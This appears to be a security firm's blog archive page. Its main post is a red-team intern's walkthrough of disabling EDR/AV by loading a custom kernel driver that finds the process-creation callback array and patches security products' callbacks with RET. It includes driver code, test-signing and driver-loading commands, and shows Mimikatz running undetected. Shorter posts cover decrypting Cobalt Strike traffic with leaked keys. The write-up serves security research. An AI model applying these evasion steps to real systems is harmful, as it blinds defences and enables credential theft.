The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (on x64), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.
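
The lookup can be pictured as a plain array of function pointers indexed by the service number. The sketch below is a toy model in user mode and nothing like the real kernel code: the three services, their numbers, the error value and all names are made up for illustration.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

// In this toy model a "system service" takes one argument and returns a value.
using SystemService = std::int64_t (*)(std::int64_t);

// Hypothetical services; the real ones are kernel routines.
std::int64_t ServiceEcho(std::int64_t value)   { return value; }
std::int64_t ServiceDouble(std::int64_t value) { return value * 2; }
std::int64_t ServiceNegate(std::int64_t value) { return -value; }

// Toy dispatch table: the array index plays the role of the system service number.
const std::array<SystemService, 3> kServiceTable = {
    &ServiceEcho, &ServiceDouble, &ServiceNegate
};

constexpr std::int64_t kInvalidServiceNumber = -1;  // stand-in error value

// Stand-in for the system service dispatcher: bounds check, look up, call.
std::int64_t DispatchSystemService(std::uint32_t serviceNumber, std::int64_t argument) {
    if (serviceNumber >= kServiceTable.size()) {
        return kInvalidServiceNumber;
    }
    return kServiceTable[serviceNumber](argument);
}

// Stand-in for an ntdll.dll stub: all it knows is its own service number.
std::int64_t StubDouble(std::int64_t value) {
    return DispatchSystemService(1, value);
}
```

The point of the model is that the stub in user land carries nothing but a number. Which code actually runs is decided entirely by the table on the kernel side.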

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64 edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Windows kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck
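
The hash-and-compare idea can be illustrated in a few lines of user-mode C. This is a toy sketch and not how PatchGuard is implemented: the FNV-1a hash and the function names are assumptions picked for brevity.

```c
#include <stddef.h>
#include <stdint.h>

/* 64-bit FNV-1a, used here only as a simple stand-in hash. */
static uint64_t fnv1a64(const uint8_t *data, size_t len)
{
    uint64_t h = 0xcbf29ce484222325ULL; /* FNV offset basis */
    for (size_t i = 0; i < len; i++) {
        h ^= data[i];
        h *= 0x100000001b3ULL;          /* FNV prime */
    }
    return h;
}

/* Hypothetical integrity check: returns 1 if the structure still matches
   the baseline hash taken earlier, 0 if it has been modified. */
static int structure_intact(const uint8_t *data, size_t len, uint64_t baseline)
{
    return fnv1a64(data, len) == baseline;
}
```

A checker would record the baseline once, re-run structure_intact() at unpredictable moments, and bugcheck as soon as it returns 0.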

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware: there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).
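
One way to picture a Native API hook is to look at the first bytes of a function in ntdll.dll. On x64, an untouched syscall stub normally starts with mov r10, rcx followed by mov eax, <system service number>, whereas a hooked one usually starts with a jump into the EDR/AV module. The sketch below checks a byte buffer for that prologue; the function names are hypothetical and it assumes a little-endian host.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Expected start of an unhooked x64 syscall stub:
     4C 8B D1        mov r10, rcx
     B8 xx xx xx xx  mov eax, <system service number> */
static const uint8_t STUB_PROLOGUE[] = { 0x4C, 0x8B, 0xD1, 0xB8 };

/* Returns 1 if the bytes look like an untouched stub, 0 otherwise. */
static int stub_looks_clean(const uint8_t *stub, size_t len)
{
    if (len < sizeof(STUB_PROLOGUE))
        return 0;
    return memcmp(stub, STUB_PROLOGUE, sizeof(STUB_PROLOGUE)) == 0;
}

/* Reads the system service number from a clean stub.
   Returns -1 if the stub is too short or does not look clean. */
static int32_t stub_service_number(const uint8_t *stub, size_t len)
{
    uint32_t ssn;
    if (len < 8 || !stub_looks_clean(stub, len))
        return -1;
    memcpy(&ssn, stub + 4, sizeof(ssn)); /* imm32 operand of mov eax */
    return (int32_t)ssn;
}
```

A buffer starting with 0xE9 (JMP rel32) fails the check, which is the kind of signal unhooking and direct-syscall tooling typically looks for.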

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to an EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft put an end to patching the SSDT in x64 versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback
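
The registration and notification steps above can be modelled in user mode. This is a minimal sketch, not kernel code: the array size, the function names and the edr_on_process handler are hypothetical, and the callback signature only loosely mirrors a process-creation notify routine.

```c
#include <stddef.h>

#define MAX_CALLBACKS 64 /* hypothetical array size for this model */

typedef void (*notify_fn)(int parent_pid, int pid, int create);

/* Stand-in for the kernel's callback array. */
static notify_fn g_callbacks[MAX_CALLBACKS];

/* Steps 2-3: a driver hands over one of its functions and the "kernel"
   stores it in the first free slot. Returns 0 on success, -1 if full. */
static int register_callback(notify_fn fn)
{
    for (size_t i = 0; i < MAX_CALLBACKS; i++) {
        if (g_callbacks[i] == NULL) {
            g_callbacks[i] = fn;
            return 0;
        }
    }
    return -1;
}

/* Steps 4-5: on process creation, every registered function is called. */
static void notify_process_created(int parent_pid, int pid)
{
    for (size_t i = 0; i < MAX_CALLBACKS; i++) {
        if (g_callbacks[i] != NULL)
            g_callbacks[i](parent_pid, pid, 1);
    }
}

/* Hypothetical EDR/AV handler: remembers the last process it was told about. */
static int g_last_seen_pid;

static void edr_on_process(int parent_pid, int pid, int create)
{
    (void)parent_pid;
    if (create)
        g_last_seen_pid = pid;
}
```

After register_callback(edr_on_process), a call to notify_process_created(4, 1234) reaches the handler, which is the point where a real product would start its inspection.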

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straightforward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback
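
The effect of the RET patch can be shown with a toy model in which a callback is just a few bytes of "code" plus a counter. This is a sketch under heavy simplification: invoke() is a hypothetical stand-in for the CPU, and a real driver would be writing to kernel memory instead of a local struct.

```c
#include <stddef.h>
#include <stdint.h>

#define OP_RET 0xC3

typedef struct {
    uint8_t code[8]; /* stand-in for the first bytes of a callback function */
    int     hits;    /* how many times the callback body actually ran */
} fake_callback;

/* Toy "CPU": if the first instruction is RET the function returns at once,
   otherwise its body runs. */
static void invoke(fake_callback *cb)
{
    if (cb->code[0] == OP_RET)
        return;
    cb->hits++;
}

/* Overwrite the first byte with RET and hand back the original byte so the
   callback can be restored later. */
static uint8_t patch_with_ret(fake_callback *cb)
{
    uint8_t original = cb->code[0];
    cb->code[0] = OP_RET;
    return original;
}

/* Put the saved byte back. */
static void restore_callback(fake_callback *cb, uint8_t original)
{
    cb->code[0] = original;
}
```

While the patch is in place the callback is still invoked but does nothing; restoring the saved byte brings the original behaviour back.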

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg:

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a bitwise AND operation on each entry in the callback array with 0xFFFFFFFFFFFFFFF8, which clears the three lowest bits of the entry.

logical and
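
As a small worked example of that mask, the helper below clears the three lowest bits of an entry. The function name and the sample value are made up for illustration; only the mask comes from the text above.

```c
#include <stdint.h>

#define CALLBACK_PTR_MASK 0xFFFFFFFFFFFFFFF8ULL

/* Clears the three lowest bits of a callback array entry, leaving the
   8-byte-aligned address the entry refers to. */
static uint64_t decode_callback_entry(uint64_t entry)
{
    return entry & CALLBACK_PTR_MASK;
}
```

For a made-up entry of 0xFFFFB10E2A4C1D6F this yields 0xFFFFB10E2A4C1D68, since 0x6F & 0xF8 is 0x68.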

The driver roughly follows the same method to locate the callback array in memory: it calculates offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
	//obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

	//loop through the first 20 bytes from the base address and search for the right OPCODE (instruction)
	//we're looking for the 0xE8 OPCODE, which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
	//loop through the first 0xFF bytes from the PspSetCreateProcessNotifyRoutine base address and search for the right OPCODES (instruction)
	//we're looking for the 0x4C 0x8D 0x2D OPCODES, which encode the LEA r13, [rip+offset] instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

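			//copy the 4 bytes after the LEA r13 (0x4C 0x8D 0x2D) OPCODES, they contain the relative offset to the callback array
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
			//return the address of the callback array: address of the LEA instruction + its length (7 bytes) + the relative offset
			return OffsetAddr + 7 + i;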
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}
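
Both lookups in the function above rely on the same arithmetic: the target equals the address of the next instruction plus a signed 32-bit displacement. The helper below reproduces that calculation on a plain byte buffer so it can be checked in user mode; resolve_rel32 is a hypothetical name and a little-endian host is assumed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Resolves the target of an instruction with a 32-bit relative operand.
   code       : bytes of the instruction (opcode bytes followed by disp32)
   insn_addr  : address at which the instruction is located
   opcode_len : number of bytes before the displacement
                (1 for CALL rel32, 3 for LEA r13, [rip+disp32])      */
static uint64_t resolve_rel32(const uint8_t *code, uint64_t insn_addr,
                              size_t opcode_len)
{
    int32_t disp;
    memcpy(&disp, code + opcode_len, sizeof(disp));
    /* next instruction = insn_addr + opcode_len + 4; the displacement is
       sign-extended so that negative offsets wrap around correctly */
    return insn_addr + opcode_len + sizeof(disp) + (uint64_t)(int64_t)disp;
}
```

With the bytes E8 10 00 00 00 at address 0x1000 the result is 0x1015, which matches the + 5 in the driver code; a LEA with displacement -7 at 0x2000 resolves to 0x2000, matching the + 7.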

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where the OPCODE_* arrays are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumber).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3-byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array
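
A defensive variant of the index lookup could refuse to scan when the build is unknown or when the selected opcode is still a 0x00 placeholder. The sketch below is an assumption about how such a guard might look, not the fix applied to the original driver: the table contents, index values and function names are hypothetical, and only the two build numbers are taken from the test VMs mentioned earlier.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical build-to-index table; the index values are placeholders. */
typedef struct {
    uint32_t build;
    size_t   index;
} build_entry;

static const build_entry BUILD_TABLE[] = { { 19042, 0 }, { 21996, 1 } };
static const uint8_t OPCODE_CALL[] = { 0xE8, 0xE8 };

#define INDEX_UNSUPPORTED ((size_t)-1)

/* Maps a Windows build number to an index, or INDEX_UNSUPPORTED. */
static size_t index_for_build(uint32_t build)
{
    for (size_t i = 0; i < sizeof(BUILD_TABLE) / sizeof(BUILD_TABLE[0]); i++) {
        if (BUILD_TABLE[i].build == build)
            return BUILD_TABLE[i].index;
    }
    return INDEX_UNSUPPORTED;
}

/* Stores the opcode to search for and returns 0, or returns -1 when the
   build is unsupported or the entry is a 0x00 placeholder. */
static int opcode_for_build(uint32_t build, uint8_t *opcode)
{
    size_t idx = index_for_build(build);
    if (idx == INDEX_UNSUPPORTED || idx >= sizeof(OPCODE_CALL))
        return -1;
    if (OPCODE_CALL[idx] == 0x00)
        return -1; /* never scan memory for a placeholder opcode */
    *opcode = OPCODE_CALL[idx];
    return 0;
}
```

Failing early like this turns a wrong index into an error the driver can report, instead of a read from an address derived from the wrong bytes.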

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

21 October 2021 at 08:59

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.

Figure 1: C2 traffic

Public and private keys are stored in file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation, which we verified, is that there are cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys file. This file is not part of a legitimate Cobalt Strike package, as it is generated at first-time use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the Cobalt Strike servers we fingerprinted (1500+) use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key is extracted for which the private key is known, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using option verbose, the private key is also displayed.

Figure 3: using option verbose to display the private key

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

All aboard the internship – whispering past defenses and sailing into kernel space

13 October 2021 at 12:25

Previously, we have already published Sander’s (@cerbersec) internship testimony. Since this post does not really contain any juicy technical details and Sander has done a terrific job putting together a walkthrough of his process, we thought it would be a waste not to highlight his previous posts again.

In Part 1, Sander explains how he started his journey and dove into process injection techniques, WIN32 API (hooking), userland vs kernel space, and Cobalt Strike’s Beacon Object Files (BOF).

Just being able to perform process injection using direct syscalls from a BOF did not signal the end of his journey yet, on the contrary. In Part 2, Sander extended our BOF arsenal with additional process injection techniques and persistence. With all this functionality bundled in an Aggressor Script, CobaltWhispers was born.

We are considering open-sourcing this little framework, but some final tweaks would be required first, as explained in the part 2 blog post.

While this is the end (for now) of Sander’s BOF journey, we have another challenging topic lined up for him: The Kernel. Here’s a little sneak peek of the next blog series/walkthrough we will be releasing. Stay tuned!


KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be. C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.


About the authors

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
Sander is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.
